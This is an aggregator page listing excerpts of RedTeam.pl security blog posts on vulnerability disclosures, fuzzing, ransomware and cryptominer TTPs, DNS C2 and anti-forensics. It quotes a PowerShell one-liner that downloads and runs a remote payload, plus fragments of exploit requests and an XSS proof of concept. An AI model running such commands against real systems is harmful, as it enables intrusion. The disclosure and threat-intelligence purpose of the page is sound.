What's new around the internet

Src | Date (GMT) | Title | Description | Tags | Stories | Notes
RedTeam.pl | 2020-08-24 15:33:59 | Stealing local files using Safari Web Share API (direct link)
Description: In general the Web Share API [https://w3c.github.io/web-share/] allows users to share links from the browser via 3rd party applications (e.g. mail and messaging apps). The problem is that the file: scheme is allowed, and when a website points to such a URL unexpected behavior occurs. In case such a link is passed to the navigator.share function an actual file from the user's file system is included in the shared message, which leads to local file disclosure when a user is sharing it unknowingly. The problem is not very serious as user interaction is required, however it is quite easy to make the shared file invisible to the user. The closest comparison that comes to mind is clickjacking, as we try to convince the unsuspecting user to perform some action.
Below are the steps to reproduce the issue:
1. Visit https://overflow.pl/webshare/poc1.html using
Tags: Guideline
RedTeam.pl | 2020-08-18 17:13:54 | Rocket.Chat Cross-Site Scripting leading to Remote Code Execution CVE-2020-15926 (direct link)
Product description: Rocket.Chat [https://rocket.chat] is an open source multiplatform messaging application similar to Slack. It is available as a self-hosted solution or in a SaaS model. Rocket.Chat can be used via a web browser, iOS, Android or using Electron based clients available for Windows, Linux and MacOS.
Affected software: The following application versions are vulnerable: Rocket.Chat
Tags: Vulnerability, Guideline
RedTeam.pl | 2020-07-10 14:59:09 | BadWPAD and spear-phishing using Battle.net Desktop App (direct link)
Brief introduction: In this blog post I would like to describe an example which shows how serious the consequences of a successful badWPAD attack can be. It is not possible to perform a MiTM (man-in-the-middle) attack on encrypted HTTPS communication without accepting a rogue certificate, however an attacker can modify cleartext HTTP traffic. This attack can be successfully performed against many modern applications which still use the plain HTTP protocol for communication, updates etc. One such example is the Battle.net Desktop App used by millions of users around the world. An attacker can change information presented to a victim in many different locations inside the application to perform high quality social engineering attacks on a mass scale.
MiTM attack on Battle.net Desktop App: How can this attack be used to perform high quality non-email based spear-phishing? I am going to demonstrate thi
RedTeam.pl | 2020-06-24 00:15:32 | Google Chrome fuzzing conclusion (direct link)
Background: This post will be a summary of a small fuzzing exercise that I was running over the course of a few months (from May 2019 to March 2020), where the focus was mostly on experimental and non-default features of the Google Chrome browser. As described in the first blog post [https://blog.redteam.pl/2019/12/chrome-portal-element-fuzzing.html], domato [https://github.com/googleprojectzero/domato] was used for test case generation because I wanted to start as soon as possible. Initially it was only about the portal element. However various other features were added to the fuzzing grammar over time, with some of them providing good results as well.
Results
Tags: Vulnerability
RedTeam.pl | 2020-06-18 22:10:28 | Spear-phishing campaign tricks users to transfer money (TTPs & IOC) (direct link)
Description: We are publishing the following information in order to help organisations identify this threat before attackers perform successful phishing on their employees. Attackers are targeting companies which have foreign trading partners, i.a. in Asia, to perform a wire transfer to a wrong bank account number. We found that domains registered using the muhammad.appleseed1@mail.ru e-mail address are actively used in a spear phishing campaign that aims to trick targets into transferring money into bank accounts controlled by the attacker using social engineering.
The most likely attack scenario looks like the following:
There is an ongoing e-mail communication between company X and Y
An attacker has gained access to an e-mail account of one of the parties
Tags: Threat, Guideline
Stories: APT 15
RedTeam.pl | 2020-06-12 21:35:46 | Black Kingdom ransomware (TTPs & IOC) (direct link)
Description: We would like to share with the community the following TTPs and IOC related to Black Kingdom ransomware and threat actors using it. Attackers gained initial access to the infrastructure via a Pulse Secure VPN vulnerability [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510]. For persistence they use a scheduled task [https://attack.mitre.org/techniques/T1053/]. The task name is GoogleUpdateTaskMachineUSA, which resembles a legitimate task of
Tags: Ransomware, Vulnerability, Threat
RedTeam.pl | 2020-06-03 13:55:20 | Kinsing cryptocurrency mining malware (TTPs & IOC) (direct link)
Description: We would like to share with the community the following TTPs and IOC related to Kinsing cryptocurrency mining malware, as most research is focused directly on analysing malware samples rather than on how it infects the system.
TTPs: Attackers are using an RCE vulnerability in Liferay which is identified as CVE-2020-7961 [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7961]. There is a publicly available PoC on GitHub [https://github.com/mzer0one/CVE-2020-7961-POC/blob/master/poc.py] for this vulnerability, which matched most artifacts we have found on the targeted system. Attackers are sending the payload using an HTTP POST request:
POST /api/jsonws/invoke
Tags: Malware, Vulnerability
RedTeam.pl | 2020-05-20 13:43:15 | Sodinokibi / REvil / Maze ransomware (TTPs & IOC) (direct link)
Description: We secured forensic evidence data in the form of disk images of VPS servers used by cybercriminals behind Sodinokibi / REvil ransomware (we also found Maze ransomware there):
decryptor.cc
dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion
Tags: Ransomware, Vulnerability
RedTeam.pl | 2020-04-14 11:45:32 | Google Chrome display locking fuzzing (direct link)
Background: While searching for interesting new functionalities in Google Chrome that would potentially be good targets for hunting security bugs, I found display locking [https://www.chromestatus.com/feature/4613920211861504]. In general it is related to rendering optimization, so it caught my attention as something that affects how the web page layout is displayed. Functionalities like this should always attract attention as a potential source of vulnerabilities. Currently display locking is hidden behind a flag (#enable-display-locking).
Setup: I used the same setup already described in my previous blog post about fuzzing the portal element [
Tags: Vulnerability
RedTeam.pl | 2020-03-18 17:56:30 | DNS for red team purposes (direct link)
Introduction: In the following blog post I would like to demonstrate a proof-of-concept for how red teamers can build DNS command & control (DNS C2, DNS C&C), perform a DNS rebinding attack and create fast flux DNS. We will focus only on the DNS server part without building a complete working platform. This approach can also be used by
Tags: Malware, Threat
RedTeam.pl | 2020-02-04 18:49:09 | Network data manipulation on the fly (direct link)
Abstract: Various types of security assessments, ranging from regular penetration testing through red teaming operations to breaking IoT/ICS devices and SCADA, involve playing with binary network protocols, which requires intercepting and modifying network data between the client and the target. Sniffing network traffic is not a big deal as we have tools like Wireshark, Tcpdump or Scapy; however modification is more challenging because we would need some kind of interface to read the network data, filter it, modify it on the fly and send it back to the target host in almost real time. In addition, it would be perfect if such a tool could automatically handle multiple connections in parallel and be scriptable. One time I found a tool called maproxy
Tags: Tool
RedTeam.pl | 2020-01-09 19:05:39 | Deceiving blue teams using anti-forensic techniques (direct link)
Brief introduction: In this short post I would like to demonstrate one of the techniques used by red teamers and real attackers to set up decoys for blue teamers. Defenders should be aware that they are not alone in setting traps such as honeypots; advanced attackers are also actively looking to fool the blue team (usually the goal is to make analysis more difficult and keep malicious content operational for a longer period of time).
Headers dependent response: Let's assume that the blue team analyzes an incident and they have found that a remote PowerShell payload has been executed:
IEX (New-Object Net.WebClient).DownloadString("https://example.com/payload.ps1")(
RedTeam.pl | 2019-12-06 20:29:30 | Google Chrome portal element fuzzing (direct link)
Background: Some time ago, while browsing my Twitter feed, I stumbled upon an interesting tweet from Michał Bentkowski [https://twitter.com/SecurityMB/status/1127963181089992705]. The description of the new portal element certainly grabbed my attention as something that may have an impact on security. You can learn more about the portal element here [https://web.dev/hands-on-portals] and here [https://wicg.github.io/portals/]. At the moment of writing this article the portal element is still behind a flag (#enable-portals), however it is available in the Google Chrome
RedTeam.pl | 2019-10-18 13:25:14 | Bypassing LLMNR/NBT-NS honeypot (direct link)
Abstract: MITRE ATT&CK™ [https://attack.mitre.org/] “is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations” which recommends the Conveigh honeypot [https://github.com/Kevin-Robertson/Conveigh] for detection of the LLMNR/NBT-NS Poisoning and Relay
Tags: Threat, Guideline
Stories: Deloitte
Notes: ★★
RedTeam.pl | 2019-10-06 23:12:03 | Internal domain name collision (direct link)
Brief introduction: Internal domain name collisions occur when organisations use local domains in the internal network and the same domain names also exist outside of the organisation, in the global DNS. A DNS query which should resolve to internal resources leaks to the Internet. If an attacker is able to control such a domain in the global DNS then he can perform MITM (Man-in-the-Middle) attacks on the organisation.
Name collision: DNS name collision became a much more severe problem when it became possible to register new TLDs (Top-Level Domains) [https://data.iana.org/TLD/tlds-alpha-by-domain.txt], especially those owned by the DONUTS company [https://donuts.domains/great-domains/domain-categories/]. The most problematic TLDs which could be used in attacks are inter alia: network
Stories: APT 32
RedTeam.pl | 2019-09-05 19:27:02 | CVE-2019-10677 Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID (direct link)
Description: With a recent software update of DASAN Zhone Solutions (DZS) routers, the company pushed fixes for multiple vulnerabilities I found in them [https://redteam.pl/poc/dasan-zhone-znid-gpon-2426a-eu.html, https://www.exploit-db.com/exploits/47351]. The vulnerabilities were registered under CVE-2019-10677 [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10677]. Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID allows a remote attacker to execute arbitrary JavaScript via manipulation of unsanitized GET parameters. This vulnerability affects all zNID models running the following firmware versions: all releases of 3.0.xxx SW (on the 3.0 branch), release 3.1.349 and earlier (on the 3.1 branch), release 3.2.087 and earlier (on the 3.2 branch), release 4.1.253 and earlier (on the 4.1 branch), release 5.0.019 and earlier (on the 5.0 branch). You can find a short description of these issues and proof-of-concept code below. There is a limit on the number of characters passed from the user to variables in the application; when we pass 50*A and 50*B in the vulnerable GET parameters:
http://admin:admin@192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=
Tags: Vulnerability
RedTeam.pl | 2019-08-14 21:45:48 | Threat hunting using DNS firewalls and data enrichment (direct link)
Description: After seeing a few advertisements about DNS firewalls and how expensive they are, I want to share my experience with blue teamers about how DNS firewalls work and how that knowledge can be used for in-house threat hunting solutions and/or building your own DNS firewall (aka do it yourself). These are examples of an approach to detect malicious behaviour, not tailor-made solutions. At the beginning I would like to highlight that it's a good practice to monitor not only logs but also DNS traffic in real time. Such traffic isn't encrypted, and if you only check DNS server logs then you can miss direct requests to other DNS servers. Additionally you can also use the recently published version of Sysmon [https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon], which supports DNS queries in event ID 22 (DNSEvent). The DNS queries used below that end with
Tags: Spam, Malware, Threat, Guideline
Stories: APT 18
RedTeam.pl | 2019-07-23 13:14:10 | Sinkholing BadWPAD infrastructure - wpad.pl / wpadblocking.com case (part 4) (direct link)
Introduction: We started research related to the BadWPAD attack (WPAD Name Collision Vulnerability [https://www.us-cert.gov/ncas/alerts/TA16-144A]), which was mainly focused on the wpadblocking.com project because it targeted millions of computers [https://blog.redteam.pl/2019/05/badwpad-dns-suffix-wpad-wpadblocking-com.html] over the last 10 years (!). In the second publication we made a deeper analysis of the WPAD file [https://blog.redteam.pl/2019/05/badwpad-and-wpad-pl-wpadblocking-com.html] to prove that it had ad
Tags: Guideline
Last update at: 2024-05-09 02:07:51